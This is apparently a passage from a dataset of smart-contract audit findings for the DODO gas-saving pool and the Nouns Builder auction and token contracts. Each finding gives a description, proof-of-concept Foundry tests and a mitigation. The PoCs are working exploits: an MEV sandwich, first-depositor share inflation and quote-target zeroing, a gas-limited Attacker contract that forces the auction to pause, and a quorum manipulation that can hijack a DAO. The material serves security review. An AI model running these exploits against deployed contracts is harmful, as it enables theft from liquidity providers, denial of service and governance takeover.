initialBaseTokensSwapped);\\n }\\n```\\n\\nTest result and logs:\\nAfter the sandwich, we can see that the MEV bot's DAI amount exceeds its initial DAI balance (profits). Additionally, the reserves for both base and quote tokens are less than the initial 10 tokens deposited by the tapir (only LP). The profit gained by the MEV bot essentially translates to a loss for the tapir.\\nAnother note on this is that even though the `adjustPrice` called by MAINTAINER without getting frontrunned, it still creates a big price difference which requires immediate arbitrages. Usually these type of parameter changes that impacts the trades are setted by time via ramping to mitigate the unfair advantages that it can occur during the price update.
Acknowledge the issue and use private RPCs to eliminate front-running, or ramp "I" towards its new value gradually so that any resulting arbitrage opportunity stays small and fair
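A minimal sketch of the ramping idea as a standalone illustration; the contract name, the `onlyMaintainer` placeholder and the linear schedule are assumptions, not DODO's actual API:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.16;\\n\\n/// @notice Illustrative linear ramp for the price parameter I (hypothetical, not GSP code)\\ncontract PriceRamp {\\n    uint256 public iStart;\\n    uint256 public iTarget;\\n    uint256 public rampStart;\\n    uint256 public rampEnd;\\n\\n    /// @dev schedule a gradual change instead of jumping to the new I in a single tx\\n    function scheduleAdjustPrice(uint256 newI, uint256 duration) external /* onlyMaintainer */ {\\n        iStart = currentI();\\n        iTarget = newI;\\n        rampStart = block.timestamp;\\n        rampEnd = block.timestamp + duration;\\n    }\\n\\n    /// @dev swap math would read this interpolated value instead of a raw storage slot\\n    function currentI() public view returns (uint256) {\\n        if (block.timestamp >= rampEnd) return iTarget;\\n        uint256 elapsed = block.timestamp - rampStart;\\n        uint256 total = rampEnd - rampStart;\\n        if (iTarget >= iStart) return iStart + ((iTarget - iStart) * elapsed) / total;\\n        return iStart - ((iStart - iTarget) * elapsed) / total;\\n    }\\n}\\n```\\nWith a schedule like this the price only moves a little per block, so a sandwich around the parameter change can capture only a small fraction of the move.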
null
```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log("Base target initial", gsp._BASE_TARGET_());\\n console.log("Quote target initial", gsp._QUOTE_TARGET_());\\n console.log("Base reserve initial", gsp._BASE_RESERVE_());\\n console.log("Quote reserve initial", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n console.log("Received base tokens", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n
First depositor can lock the quote target value to zero
medium
When the initial deposit occurs, it is possible for the quote target to be set to 0. This situation significantly impacts other LPs as well. Even if subsequent LPs deposit substantial amounts, the quote target remains at 0 due to multiplication with this zero value. A QUOTE_TARGET of 0 will impact the swaps that the pool facilitates.\\nWhen the first deposit happens, QUOTE_TARGET is set as follows:\\n```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n\\nIn this scenario, the 'shares' value can be a minimum of 1e3, as indicated here: link to code snippet.\\nThis implies that if someone deposits minuscule amounts of quote token and base token, they can set the QUOTE_TARGET to zero because the `mulFloor` operation uses a scaling factor of 1e18:\\n```\\nfunction mulFloor(uint256 target, uint256 d) internal pure returns (uint256) {\\n return target * d / (10 ** 18);\\n }\\n```\\n\\n```\\n// @review 0 + (0 * something) = 0! doesn't matter what amount has been deposited !\\n_QUOTE_TARGET_ = uint112(uint256(_QUOTE_TARGET_) + (DecimalMath.mulFloor(uint256(_QUOTE_TARGET_), mintRatio)));\\n```\\n\\nHere is a PoC showing that if the first deposit is tiny, the QUOTE_TARGET is 0. Whatever is deposited afterwards still leaves the QUOTE_TARGET at 0 because of the multiplication by 0!\\n```\\nfunction test_StartWithZeroTarget() external {\\n // tapir deposits tiny amounts to make quote target 0\\n vm.startPrank(tapir);\\n dai.safeTransfer(address(gsp), 1 * 1e5);\\n usdc.transfer(address(gsp), 1 * 1e5);\\n gsp.buyShares(tapir);\\n\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // quote target is indeed 0!\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n\\n vm.stopPrank();\\n\\n // hippo deposits properly\\n vm.startPrank(hippo);\\n dai.safeTransfer(address(gsp), 1000 * 1e18);\\n usdc.transfer(address(gsp), 10000 * 1e6);\\n gsp.buyShares(hippo);\\n\\n console.log("Base target", gsp._BASE_TARGET_());\\n console.log("Quote target", gsp._QUOTE_TARGET_());\\n console.log("Base reserve", gsp._BASE_RESERVE_());\\n console.log("Quote reserve", gsp._QUOTE_RESERVE_());\\n\\n // although hippo deposited 1000 USDC as quote tokens, target is still 0 due to multiplication with 0\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n }\\n```\\n\\nTest result and logs:
Scale the quote token balance by the proper decimal scalar (according to the quote token's decimals) before computing the target, so that a tiny initial deposit cannot round the quote target down to zero.
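In addition to the decimal scaling, a minimal sketch of a defensive guard on the initial deposit; the `require` line is illustrative and not DODO's actual code:\\n```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n // hypothetical guard: reject an initial deposit whose quote target rounds to zero\\n require(_QUOTE_TARGET_ > 0, "ZERO_QUOTE_TARGET");\\n }\\n```\\n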
Since the quote target is used by the pool when deciding the swap math, I label this as high.
```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n
Share Price Inflation by First LP-er, Enabling DOS Attacks on Subsequent buyShares with Up to 1001x the Attacking Cost
medium
The smart contract contains a critical vulnerability that allows a malicious actor to manipulate the share price during the initialization of the liquidity pool, potentially leading to a DOS attack on subsequent buyShares operations.\\nThe root cause of the vulnerability lies in the initialization process of the liquidity pool, specifically in the calculation of shares during the first deposit.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n\\nIf the pool is empty, the smart contract directly sets the share value based on the minimum of the base-token-denominated values of the provided assets. This assumption can be manipulated by a malicious actor during the first deposit, leading to a situation where the LP pool token becomes extremely expensive.\\nAttack Scenario\\nThe attacker exploits the vulnerability during the initialization of the liquidity pool:\\nThe attacker mints 1001 `shares` during the first deposit.\\nImmediately, the attacker sells back 1000 `shares`, keeping only 1 wei via the `sellShares` function.\\nThe attacker then donates a large amount (1000e18) of base and quote tokens and invokes the `sync()` routine to pump the base and quote reserves to 1001 + 1000e18.\\nThe protocol users proceed to execute the `buyShares` function with a balance less than `attacker's spending * 1001`. The transaction reverts due to the `mintRatio` being kept below 1001 wad and the computed `shares` less than 1001 (line 71), while it needs a value >= 1001 to mint `shares` successfully.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 2. normal case\\n uint256 baseInputRatio = DecimalMath.divFloor(baseInput, baseReserve);\\n uint256 quoteInputRatio = DecimalMath.divFloor(quoteInput, quoteReserve);\\n uint256 mintRatio = quoteInputRatio < baseInputRatio ? 
quoteInputRatio : baseInputRatio; // <= FOUND: mintRatio below 1001wad if input amount smaller than reserves * 1001\\n // The shares will be minted to user\\n shares = DecimalMath.mulFloor(totalSupply, mintRatio); // <= FOUND: the manipulated totalSupply of 1wei requires a mintRatio of greater than 1000 for a successful _mint()\\n // rest of code\\n }\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPVault.sol\\n function _mint(address user, uint256 value) internal {\\n require(value > 1000, "MINT_AMOUNT_NOT_ENOUGH"); // <= FOUND: next buyShares with volume less than 1001 x attacker balance will revert here\\n// rest of code\\n }\\n```\\n\\nThe `_mint()` function fails with a "MINT_AMOUNT_NOT_ENOUGH" error, causing a denial-of-service condition for subsequent buyShares operations.\\nPOC\\n```\\n// File: dodo-gassaving-pool/test/GPSTrader.t.sol\\n function test_mint1weiShares_DOSx1000DonationVolume() public {\\n GSP gspTest = new GSP();\\n gspTest.init(\\n MAINTAINER,\\n address(mockBaseToken),\\n address(mockQuoteToken),\\n 0,\\n 0,\\n 1000000,\\n 500000000000000,\\n false\\n );\\n\\n // Buy 1001 shares\\n vm.startPrank(USER);\\n mockBaseToken.transfer(address(gspTest), 1001);\\n mockQuoteToken.transfer(address(gspTest), 1001 * gspTest._I_() / 1e18);\\n gspTest.buyShares(USER);\\n assertEq(gspTest.balanceOf(USER), 1001);\\n\\n // User sells shares and keep ONLY 1wei\\n gspTest.sellShares(1000, USER, 0, 0, "", block.timestamp);\\n assertEq(gspTest.balanceOf(USER), 1);\\n\\n // User donate a huge amount of base & quote tokens to inflate the share price\\n uint256 donationAmount = 1000e18;\\n mockBaseToken.transfer(address(gspTest), donationAmount);\\n mockQuoteToken.transfer(address(gspTest), donationAmount * gspTest._I_() / 1e18);\\n gspTest.sync();\\n vm.stopPrank();\\n\\n // DOS subsequent operations with roughly 1001 x donation volume\\n uint256 dosAmount = donationAmount * 1001;\\n mockBaseToken.mint(OTHER, type(uint256).max);\\n mockQuoteToken.mint(OTHER, type(uint256).max);\\n\\n vm.startPrank(OTHER);\\n mockBaseToken.transfer(address(gspTest), dosAmount);\\n mockQuoteToken.transfer(address(gspTest), dosAmount * gspTest._I_() / 1e18);\\n\\n vm.expectRevert("MINT_AMOUNT_NOT_ENOUGH");\\n gspTest.buyShares(OTHER);\\n vm.stopPrank();\\n }\\n```\\n\\nA PASS result would confirm that any deposits with volume less than 1001 times to attacker cost would fail. That means by spending $1000, the attacker can DOS any transaction with volume below $1001,000.
A mechanism should be implemented to handle the case of zero totalSupply during initialization. A potential solution is inspired by Uniswap V2 Core Code, which sends the first 1001 LP tokens to the zero address. This way, it's extremely costly to inflate the share price as much as 1001 times on the first deposit.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; \\n+ _mint(address(0), 1001); // permanently lock the first MINIMUM_LIQUIDITY of 1001 tokens, makes it impossible to manipulate the totalSupply to 1 wei\\n // rest of code\\n```\\n
The impact of this vulnerability is severe, as it allows an attacker to conduct DOS attacks on buyShares with a low attacking cost (retrievable for further attacks via sellShares). This significantly impairs the core functionality of the protocol, potentially preventing further LP operations and hindering the protocol's ability to attract Total Value Locked (TVL) for other trading operations such as sellBase, sellQuote and flashloan.
```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n
Attacker can force pause the Auction contract.
medium
In certain situations (e.g. founders having an ownership percentage greater than 51%) an attacker can potentially exploit the `try catch` within the `Auction._CreateAuction()` function to arbitrarily pause the auction contract.\\nConsider the code from the `Auction._CreateAuction()` function, which is called by `Auction.settleCurrentAndCreateNewAuction()`. It first tries to mint a new token for the auction, and if the minting fails the `catch` branch will be triggered, pausing the auction.\\n```\\nfunction _createAuction() private returns (bool) {\\n    // Get the next token available for bidding\\n    try token.mint() returns (uint256 tokenId) {\\n        // Store the token id\\n        auction.tokenId = tokenId;\\n\\n        // Cache the current timestamp\\n        uint256 startTime = block.timestamp;\\n\\n        // Used to store the auction end time\\n        uint256 endTime;\\n\\n        // Cannot realistically overflow\\n        unchecked {\\n            // Compute the auction end time\\n            endTime = startTime + settings.duration;\\n        }\\n\\n        // Store the auction start and end time\\n        auction.startTime = uint40(startTime);\\n        auction.endTime = uint40(endTime);\\n\\n        // Reset data from the previous auction\\n        auction.highestBid = 0;\\n        auction.highestBidder = address(0);\\n        auction.settled = false;\\n\\n        // Reset referral from the previous auction\\n        currentBidReferral = address(0);\\n\\n        emit AuctionCreated(tokenId, startTime, endTime);\\n        return true;\\n    } catch {\\n        // Pause the contract if token minting failed\\n        _pause();\\n        return false;\\n    }\\n}\\n```\\n\\nDue to the internal logic of the `mint` function, if there are founders with high ownership percentages, many tokens can be minted to them during calls to mint as part of the vesting mechanism. As a consequence, under some circumstances calls to `mint` can consume huge amounts of gas.\\nCurrently on Ethereum and EVM-compatible chains, calls can consume at most 63/64 of the parent's call gas (see EIP-150). An attacker can exploit these circumstances of high gas cost to restrict the parent call's gas limit, making `token.mint()` fail while still leaving enough gas (1/64) for the `_pause()` call to succeed. Therefore they are able to force the pausing of the auction contract at will.\\nBased on the gas requirements (1/64 of the call's gas has to be enough for `_pause()`'s gas cost of 21572), `token.mint()` will need to consume at least 1359036 gas (63 * 21572); consequently it is only possible in some situations, such as founders with a high vesting percentage, for example 51% or more.\\nConsider the following POC. 
Here we are using another contract to restrict the gas limit of the call, but this can also be done with an EOA call from the attacker.\\nExploit contract code:\\n```\\npragma solidity ^0.8.16;\\n\\ncontract Attacker {\\n function forcePause(address target) external {\\n bytes4 selector = bytes4(keccak256("settleCurrentAndCreateNewAuction()"));\\n assembly {\\n let ptr := mload(0x40)\\n mstore(ptr,selector)\\n let success := call(1500000, target, 0, ptr, 4, 0, 0)\\n }\\n }\\n}\\n```\\n\\nPOC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.16;\\n\\nimport { NounsBuilderTest } from "./utils/NounsBuilderTest.sol";\\nimport { MockERC721 } from "./utils/mocks/MockERC721.sol";\\nimport { MockImpl } from "./utils/mocks/MockImpl.sol";\\nimport { MockPartialTokenImpl } from "./utils/mocks/MockPartialTokenImpl.sol";\\nimport { MockProtocolRewards } from "./utils/mocks/MockProtocolRewards.sol";\\nimport { Auction } from "../src/auction/Auction.sol";\\nimport { IAuction } from "../src/auction/IAuction.sol";\\nimport { AuctionTypesV2 } from "../src/auction/types/AuctionTypesV2.sol";\\nimport { TokenTypesV2 } from "../src/token/types/TokenTypesV2.sol";\\nimport { Attacker } from "./Attacker.sol";\\n\\ncontract AuctionTest is NounsBuilderTest {\\n MockImpl internal mockImpl;\\n Auction internal rewardImpl;\\n Attacker internal attacker;\\n address internal bidder1;\\n address internal bidder2;\\n address internal referral;\\n uint16 internal builderRewardBPS = 300;\\n uint16 internal referralRewardBPS = 400;\\n\\n function setUp() public virtual override {\\n super.setUp();\\n bidder1 = vm.addr(0xB1);\\n bidder2 = vm.addr(0xB2);\\n vm.deal(bidder1, 100 ether);\\n vm.deal(bidder2, 100 ether);\\n mockImpl = new MockImpl();\\n rewardImpl = new Auction(address(manager), address(rewards), weth, builderRewardBPS, referralRewardBPS);\\n attacker = new Attacker();\\n }\\n\\n function test_POC() public {\\n // START OF SETUP\\n address[] memory wallets = new address[](1);\\n uint256[] memory percents = new uint256[](1);\\n uint256[] memory vestingEnds = new uint256[](1);\\n wallets[0] = founder;\\n percents[0] = 99;\\n vestingEnds[0] = 4 weeks;\\n //Setting founder with high percentage ownership.\\n setFounderParams(wallets, percents, vestingEnds);\\n setMockTokenParams();\\n setMockAuctionParams();\\n setMockGovParams();\\n deploy(foundersArr, tokenParams, auctionParams, govParams);\\n setMockMetadata();\\n // END OF SETUP\\n\\n // Start auction contract and do the first auction\\n vm.prank(founder);\\n auction.unpause();\\n vm.prank(bidder1);\\n auction.createBid{ value: 0.420 ether }(99);\\n vm.prank(bidder2);\\n auction.createBid{ value: 1 ether }(99);\\n\\n // Move block.timestamp so auction can end.\\n vm.warp(10 minutes + 1 seconds);\\n\\n //Attacker calls the auction\\n attacker.forcePause(address(auction));\\n\\n //Check that auction was paused.\\n assertEq(auction.paused(), true);\\n }\\n}\\n```\\n
Consider better handling the possible errors from `Token.mint()`, as shown below:\\n```\\n    function _createAuction() private returns (bool) {\\n        // Get the next token available for bidding\\n        try token.mint() returns (uint256 tokenId) {\\n            // CODE OMITTED\\n        } catch (bytes memory err) {\\n            // On production consider pre-calculating the hash values to save gas\\n            if (keccak256(abi.encodeWithSignature("NO_METADATA_GENERATED()")) == keccak256(err)) {\\n                _pause();\\n                return false;\\n            } else if (keccak256(abi.encodeWithSignature("ALREADY_MINTED()")) == keccak256(err)) {\\n                _pause();\\n                return false;\\n            } else {\\n                revert OUT_OF_GAS();\\n            }\\n        }\\n    }\\n```\\n
Should the conditions mentioned above be met, an attacker can arbitrarily pause the auction contract, effectively interrupting the DAO auction process. This pause persists until the owners take subsequent action to unpause the contract. The attacker can exploit this vulnerability repeatedly.
```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n
MerkleReserveMinter minting methodology is incompatible with current governance structure and can lead to migrated DAOs being hijacked immediately
medium
MerkleReserveMinter allows large number of tokens to be minted instantaneously which is incompatible with the current governance structure which relies on tokens being minted individually and time locked after minting by the auction. By minting and creating a proposal in the same block a user is able to create a proposal with significantly lower quorum than expected. This could easily be used to hijack the migrated DAO.\\nMerkleReserveMinter.sol#L154-L167\\n```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n\\nWhen minting from the claim merkle tree, a user is able to mint as many tokens as they want in a single transaction. This means in a single transaction, the supply of the token can increase very dramatically. Now we'll take a look at the governor contract as to why this is such an issue.\\nGovernor.sol#L184-L192\\n```\\n // Store the proposal data\\n proposal.voteStart = SafeCast.toUint32(snapshot);\\n proposal.voteEnd = SafeCast.toUint32(deadline);\\n proposal.proposalThreshold = SafeCast.toUint32(currentProposalThreshold);\\n proposal.quorumVotes = SafeCast.toUint32(quorum());\\n proposal.proposer = msg.sender;\\n proposal.timeCreated = SafeCast.toUint32(block.timestamp);\\n\\n emit ProposalCreated(proposalId, _targets, _values, _calldatas, _description, descriptionHash, proposal);\\n```\\n\\nGovernor.sol#L495-L499\\n```\\nfunction quorum() public view returns (uint256) {\\n unchecked {\\n return (settings.token.totalSupply() * settings.quorumThresholdBps) / BPS_PER_100_PERCENT;\\n }\\n}\\n```\\n\\nWhen creating a proposal, we see that it uses a snapshot of the CURRENT total supply. This is what leads to the issue. The setup is fairly straightforward and occurs all in a single transaction:\\nCreate a malicious proposal (which snapshots current supply)\\nMint all the tokens\\nVote on malicious proposal with all minted tokens\\nThe reason this works is because the quorum is based on the supply before the mint while votes are considered after the mint, allowing significant manipulation of the quorum.
Token should be changed to use a checkpoint based total supply, similar to how balances are handled. Quorum should be based on that instead of the current supply.
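A minimal sketch of quorum based on a snapshotted supply, assuming the token exposes an OpenZeppelin Votes-style `getPastTotalSupply`; the wiring shown here is illustrative, not the existing Governor code:\\n```\\n    // quorum measured against the supply at the proposal snapshot instead of the live supply\\n    function quorumAt(uint256 snapshot) public view returns (uint256) {\\n        unchecked {\\n            return (settings.token.getPastTotalSupply(snapshot) * settings.quorumThresholdBps) / BPS_PER_100_PERCENT;\\n        }\\n    }\\n\\n    // inside propose():\\n    // proposal.quorumVotes = SafeCast.toUint32(quorumAt(snapshot));\\n```\\nWith this change, a large mint executed after a proposal is created can no longer shrink the effective quorum relative to the votes cast.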
DAO can be completely hijacked
```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n
when reservedUntilTokenId > 100 the first founder loses 1% of NFTs
high
The incorrect use of `baseTokenId = reservedUntilTokenId` may result in the first `tokenRecipient[]` being invalid, thus preventing the founder from obtaining this portion of the NFT.\\nThe current protocol adds a parameter `reservedUntilTokenId` for reserving `Token`. This parameter will be used as the starting `baseTokenId` during initialization.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n\\nBecause `baseTokenId = reservedUntilTokenId` is used, if `reservedUntilTokenId>100`, for example, reservedUntilTokenId=200, the first `_getNextTokenId(200)` will return `baseTokenId=200 , tokenRecipient[200]=newFounder`.\\nExample: reservedUntilTokenId = 200 founder[0].founderPct = 10\\nIn this way, the `tokenRecipient[]` of `founder` will become tokenRecipient[200].wallet = `founder` ( first will call _getNextTokenId(200) return 200) tokenRecipient[10].wallet = `founder` ( second will call _getNextTokenId((200 + 10) %100 = 10) ) tokenRecipient[20].wallet = `founder` ... tokenRecipient[90].wallet = `founder`\\nHowever, this `tokenRecipient[200]` will never be used, because in `_isForFounder()`, it will be modulo, so only `baseTokenId < 100` is valid. 
In this way, the first founder actually receives only `9%` of the NFTs instead of the intended 10%.\\n```\\n    function _isForFounder(uint256 _tokenId) private returns (bool) {\\n        // Get the base token id\\n        uint256 baseTokenId = _tokenId % 100;\\n\\n        // If there is no scheduled recipient:\\n        if (tokenRecipient[baseTokenId].wallet == address(0)) {\\n            return false;\\n\\n            // Else if the founder is still vesting:\\n        } else if (block.timestamp < tokenRecipient[baseTokenId].vestExpiry) {\\n            // Mint the token to the founder\\n            _mint(tokenRecipient[baseTokenId].wallet, _tokenId);\\n\\n            return true;\\n\\n            // Else the founder has finished vesting:\\n        } else {\\n            // Remove them from future lookups\\n            delete tokenRecipient[baseTokenId];\\n\\n            return false;\\n        }\\n    }\\n```\\n\\nPOC\\nThe following test demonstrates that `tokenRecipient[200]` is assigned to the founder.\\nWe need to change tokenRecipient to public so we can assertEq on it:\\n```\\ncontract TokenStorageV1 is TokenTypesV1 {\\n    /// @notice The token settings\\n    Settings internal settings;\\n\\n    /// @notice The vesting details of a founder\\n    /// @dev Founder id => Founder\\n    mapping(uint256 => Founder) internal founder;\\n\\n    /// @notice The recipient of a token\\n    /// @dev ERC// Remove the line below\\n721 token id => Founder\\n// Remove the line below\\n mapping(uint256 => Founder) internal tokenRecipient;\\n// Add the line below\\n mapping(uint256 => Founder) public tokenRecipient;\\n}\\n```\\n\\nadd to `token.t.sol`\\n```\\n    function test_lossFirst(address _minter, uint256 _reservedUntilTokenId, uint256 _tokenId) public {\\n        deployAltMock(200);\\n        (address wallet ,,)= token.tokenRecipient(200);\\n        assertEq(wallet,founder);\\n    }\\n```\\n\\n```\\n$ forge test -vvv --match-test test_lossFirst\\n\\nRunning 1 test for test/Token.t.sol:TokenTest\\n[PASS] test_lossFirst(address,uint256,uint256) (runs: 256, μ: 3221578, ~: 3221578)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 355.45ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n
A better is that the baseTokenId always starts from 0.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId =0;\\n```\\n\\nor\\nuse `uint256 baseTokenId = reservedUntilTokenId % 100;`\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId = reservedUntilTokenId % 100;\\n```\\n
When reservedUntilTokenId > 100, the first founder loses 1% of the NFTs they are owed.
```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n
Adversary can permanently brick auctions due to precision error in Auction#_computeTotalRewards
high
